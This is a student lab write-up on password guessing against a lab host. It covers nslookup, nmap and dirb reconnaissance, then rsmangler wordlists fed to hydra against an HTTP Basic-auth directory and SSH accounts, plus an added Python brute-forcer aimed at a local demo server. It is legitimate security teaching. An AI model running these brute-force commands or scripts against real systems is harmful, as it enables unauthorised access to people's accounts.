Lab 5.1: Password-Guessing
Scenario
10.0.5.21 hosts a listing of staff biographies (bios) that can in turn be used for information gathering. If successful, you can gain access to hidden resources and possibly a login or two.
Check to make sure SSH works

NSLookup
Run your port scanner script to find the DNS server on the 10.0.5.0/24 network.

nslookup 10.0.5.21 10.0.5.22
This command asks the DNS server we found (10.0.5.22) for a reverse (PTR) lookup of 10.0.5.21, i.e. the hostname that maps to that address.

Deliverable 1. Provide a screenshot that shows the lookup and reported hostname.
Hacking the Shire Staff
Target: 10.0.5.21
Deliverable 2. Using what you learned during the reconnaissance modules, run a scan to determine any listening TCP services, including the service versions. Provide a screenshot of both your command and results.

nmap -sV 10.0.5.21
22/tcp open ssh OpenSSH 8.0
80/tcp open http Apache httpd 2.4.37
9090/tcp closed zeus-admin
Deliverable 3. Let's see if we can get a little more information on the website, such as hidden directories. Research the dirb command and run it against the web server. Turn off recursion. Provide a screenshot of anything secret you've found.
dirb http://10.0.5.21 -r
-r
turns off recursion (dirb only checks the top-level wordlist entries instead of descending into every directory it finds)


Deliverable 4. Provide a screenshot that displays a prompt when attempting to access a protected directory.

Cracking the http password
The usernames for our HTTP password-protected directory will be just the first names of our characters, such as samwise, pippin, bilbo, and frodo.
Start with one of the group member's output lists from rsmangler to try and guess passwords on the target server.
When doing the maximum characters for Frodo, 8 characters excluded the secret word that I needed to use to get the password. I increased the max to 12 characters to avoid that issue.
Frodo
nano frodo.txt
Input Words:
The list to be mangled needs to have a newline at the end of it (otherwise the last word may not be read).
rsmangler --file frodo.txt -m 6 -x 12 > frodo.pass.txt
--file frodo.txt
specifies the file with the words you want to mangle
-m 6 -x 12
means make the words minimum 6 characters and maximum 12 characters
> frodo.pass.txt
specifies the file you want to put the mangled words into
wc -l frodo.pass.txt
(to check the word count, i.e. how many guesses hydra will make)
sudo hydra -l frodo -P frodo.pass.txt 10.0.5.21 -m /admin/ http-get
-l frodo
the single username to try
-P frodo.pass.txt
the password list to try
-m /admin/
sets the path for the HTTP-protected page
http-get
specifies the protocol and method

Pippin
nano pippin.txt
Input words:
The list to be mangled needs to have a newline at the end of it
rsmangler --file pippin.txt -m 6 -x 12 > pippin.pass.txt
wc -l pippin.pass.txt
(to check word count)
sudo hydra -l pippin -P pippin.pass.txt 10.0.5.21 -m /admin/ http-get

Bilbo
nano bilbo.txt
Input words:
The list to be mangled needs to have a newline at the end of it
rsmangler --file bilbo.txt -m 6 -x 12 > bilbo.pass.txt
wc -l bilbo.pass.txt
(to check word count)
sudo hydra -l bilbo -P bilbo.pass.txt 10.0.5.21 -m /admin/ http-get

Samwise
nano samwise.txt
Input words:
The list to be mangled needs to have a newline at the end of it
rsmangler --file samwise.txt -m 6 -x 12 > samwise.pass.txt
wc -l samwise.pass.txt
(to check word count)
sudo hydra -l samwise -P samwise.pass.txt 10.0.5.21 -m /admin/ http-get
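The two steps above (find the protected directory, then guess the Basic-auth password with a mangled wordlist) reduced to working code. This is an added example written for this page, not part of the lab or of dirb/rsmangler/hydra. The mangler implements only a small subset of rsmangler's rules (case, reversal, leet, two-word joins and a handful of suffixes), and the target is a throwaway local HTTP server with a constructed /admin/ directory, user "frodo" and password "Shire2024" so the whole thing runs offline. Note how a max length of 8 drops the real password, which is exactly the problem described for Frodo above.

```python
"""Added example: mini dirb + rsmangler-style mangling + HTTP Basic guessing.
Everything here (server, paths, user, password) is constructed for the demo."""
import base64
import itertools
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

SUFFIXES = ["", "1", "123", "!", "2024"]   # assumption: a few of rsmangler's suffix rules
LEET = str.maketrans("aeios", "43105")


def mangle(words, min_len=6, max_len=12):
    """Rough stand-in for `rsmangler --file words -m MIN -x MAX`."""
    base = set()
    for w in words:
        w = w.strip()
        if not w:                      # blank/trailing line: skip, never emit ""
            continue
        base.update({w, w.lower(), w.upper(), w.capitalize(),
                     w[::-1], w.translate(LEET)})
    for a, b in itertools.permutations(sorted(base), 2):   # two-word joins
        base.add(a + b)
    out = set()
    for w in base:
        for s in SUFFIXES:
            cand = w + s
            if min_len <= len(cand) <= max_len:           # the -m / -x window
                out.add(cand)
    return sorted(out)


class ShireHandler(BaseHTTPRequestHandler):
    """Constructed target: / is public, /admin/ needs Basic auth, rest is 404."""
    USER, PASSWORD = "frodo", "Shire2024"     # constructed demo credentials

    def do_GET(self):
        if self.path not in ("/", "/admin/"):
            self.send_response(404); self.end_headers(); return
        creds = base64.b64encode(f"{self.USER}:{self.PASSWORD}".encode()).decode()
        if self.path == "/admin/" and self.headers.get("Authorization") != "Basic " + creds:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Shire Staff"')
            self.end_headers(); return
        self.send_response(200); self.end_headers(); self.wfile.write(b"secret\n")

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_server():
    srv = HTTPServer(("127.0.0.1", 0), ShireHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def probe_paths(base_url, names):
    """Mini dirb: every name that does not come back 404 exists; 401 = protected."""
    found = {}
    for name in names:
        path = f"/{name}/"
        try:
            with urlopen(base_url + path, timeout=5) as resp:
                found[path] = resp.status
        except HTTPError as e:
            if e.code != 404:
                found[path] = e.code
    return found


def guess_basic_auth(url, user, candidates):
    """What `hydra -l USER -P LIST host -m /admin/ http-get` does: one GET per
    candidate with an Authorization: Basic header; first 200 is the hit."""
    for pw in candidates:
        token = base64.b64encode(f"{user}:{pw}".encode()).decode()
        req = Request(url, headers={"Authorization": "Basic " + token})
        try:
            with urlopen(req, timeout=5) as resp:
                if resp.status == 200:
                    return pw
        except HTTPError as e:
            if e.code != 401:          # anything other than "rejected" is unexpected
                raise
    return None


def demo(words=("shire",), max_len=12):
    """Run the whole lab flow against the local server; returns (dirs, password)."""
    srv, base = start_server()
    try:
        hidden = probe_paths(base, ["images", "admin", "backup"])
        wordlist = mangle(words, 6, max_len)          # like `wc -l`: len(wordlist)
        return hidden, guess_basic_auth(base + "/admin/", "frodo", wordlist)
    finally:
        srv.shutdown(); srv.server_close()


if __name__ == "__main__":
    print(demo())
```

Running it prints `({'/admin/': 401}, 'Shire2024')`; with `demo(max_len=8)` the password is never tried and the guess comes back `None`, so always sanity-check that your -x value is long enough for the kind of password you expect before blaming the wordlist.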

Brute forcing system accounts
Brute-forcing web logins can be much faster than some other services. SSH, for example, will often tear down the session after 3 failed logins, which slows down password guessing; that is also why hydra is run with -t 4 below, since the default of 16 parallel tasks tends to trip such limits.
The target server also has SSH login accounts for the same staff members, though their names are formatted firstname.lastname. (pippin is a nickname, not a first name, and wouldn't be used.)
We are going to use the same method we used for the HTTP password cracking, just with ssh instead. Follow the commands below for each of the 4 accounts to find the passwords!
nano wordlist.txt
rsmangler --file wordlist.txt -m 6 -x 12 > wordlist.pass.txt
sudo hydra -l firstname.lastname -P wordlist.pass.txt 10.0.5.21 -t 4 ssh
frodo.baggins

peregrin.took

bilbo.baggins

samwise.gamgee